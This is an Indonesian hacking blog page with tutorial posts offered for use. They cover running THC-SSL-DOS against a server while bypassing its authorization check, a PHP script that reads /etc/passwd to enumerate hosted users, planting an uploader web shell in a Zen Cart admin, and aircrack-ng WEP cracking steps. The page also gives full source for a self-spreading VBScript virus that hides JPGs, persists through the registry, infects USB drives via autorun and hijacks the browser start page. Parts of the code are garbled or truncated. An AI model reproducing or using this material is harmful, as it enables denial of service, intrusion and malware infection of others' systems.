Search

SSL DOS


1. Cara menggunakan :
download dulu filnya di
http://www.4shared.com/get/GSCIoHne/thc-ssl-dos-14tar.html
ekstrak dulu filenya dengan

tar xvf thc-ssl-dos-1.4.tar.gz


lalu masuk ke folder /thc-ssl-dos-1.4.tar.gz

lakukan 

./configure

klo ada error


Quote:configure: error: libcrypto not found part of openssl.


berarti harus install libssl-dev

apt-get install libssl-dev

trus

make all install

jalaninnya:

./thc-ssl-dos masuk.in.ip.target 443

klo ada error:


Quote:ERROR:
Please agree by using '--accept' option that the IP is a legitimate target
and that you are fully authorized to perform the test against this target.

ini semacam agreement antara kita dengan pembuat aplikasi, tambahin --accept aja di line diatas

./thc-ssl-dos masuk.in.ip.target 443 --accept

jika sudah jalan akan muncul seperti dibawah:


Quote:root@iKONs:~/Programs/thc-ssl-dos-1.4/src# thc-ssl-dos masuk.in.ip.target 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/

http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground


Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 45 [45.39 h/s], 14 Conn, 0 Err
Handshakes 111 [66.31 h/s], 14 Conn, 0 Err
Handshakes 177 [66.50 h/s], 14 Conn, 0 Err
Handshakes 246 [68.77 h/s], 16 Conn, 0 Err
Handshakes 310 [64.02 h/s], 17 Conn, 0 Err
Handshakes 380 [70.01 h/s], 17 Conn, 0 Err
Handshakes 447 [67.14 h/s], 17 Conn, 0 Err
Handshakes 499 [51.92 h/s], 18 Conn, 0 Err
Handshakes 565 [66.16 h/s], 18 Conn, 0 Err
Handshakes 631 [65.66 h/s], 18 Conn, 0 Err
Handshakes 694 [62.98 h/s], 19 Conn, 0 Err
Handshakes 761 [67.30 h/s], 19 Conn, 0 Err
Handshakes 823 [61.69 h/s], 19 Conn, 0 Err
Handshakes 886 [62.96 h/s], 20 Conn, 0 Err

perhatikan yg warna merah diatas, berarti yg ane lakukan sekitar 60-70 koneksi per detik terhadap server, normalnya sebuah server dapat melakukan sampai 300 koneksi SSL
sehingga dapat disimpulkan serangan DoS yang ane lakukan tidak berhasil membuat server down 

berarti paling ngga ada 5 komputer dengan tools ini utk menjatuhkan suatu server...cmiiw
Diposting oleh Unknown di 15.43 0 komentar
Label:

Tools untuk mencari Cpanel PHP


tools gunanya untuk menc
nih scriptnya
echo "";
echo "";

set_time_limit(0);
##################
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
echo "[-] Error : coudn't read /etc/passwd";
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,":");
$username=substr($str,0,$pos);
$dirz="/home/$username/public_html/";
if (($username!="")) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################

#########################
echo "

";
echo "";

?>

Diposting oleh Unknown di 15.35 0 komentar
Label:

Upload backdoor di Zencart



1. Login ke page admin .
2. masuk ke file dimana kita bisa mengedit filefile
?
http://site/path/admin/define_pages_editor.php

pilih plain text, dan pilih salah satu file yang mau kita edit dan masukkan script uploader ato shell kalian
?
<?php
echo '<b>Jundab<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data"
name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50">
<input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
{ echo '<b>Upload Success !!!</b><br><br>'; }
    else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>
masuk ke file yang kalian pilih tadi melalui index.php
?
index.php?main_page=$file
contoh jika kalian memilih contact_us maka masuk ke file tersebut sebagai berikut :
?
index.php?main_page=contact_us
Tidak semua zencart bisa di edit filenya, karna sudah diberikan perm .
Kalaupun bisa diedit, belom tentu juga bisa upload file, karna dir dari path website tersebut di .htaccess atau diberikan permission ;)





Diposting oleh Unknown di 15.33 0 komentar
Label:

Hack WiFi dengan BT-4



1. Boot computer with Backtrack 4 (login: root , pass: toor / “poweroff” at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 ***My interface is wlan0. It may be yours also. Replace all the wlan0 with your own interface!***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap
Diposting oleh Unknown di 15.31 0 komentar
Label:

Virus Visual Basic


Cara Membuat Virus Menggunakan Visual Basic (VB)
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer
Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()
Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “KONYOL”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.

Diposting oleh Unknown di 15.29 0 komentar
Label:
Langganan: Postingan (Atom)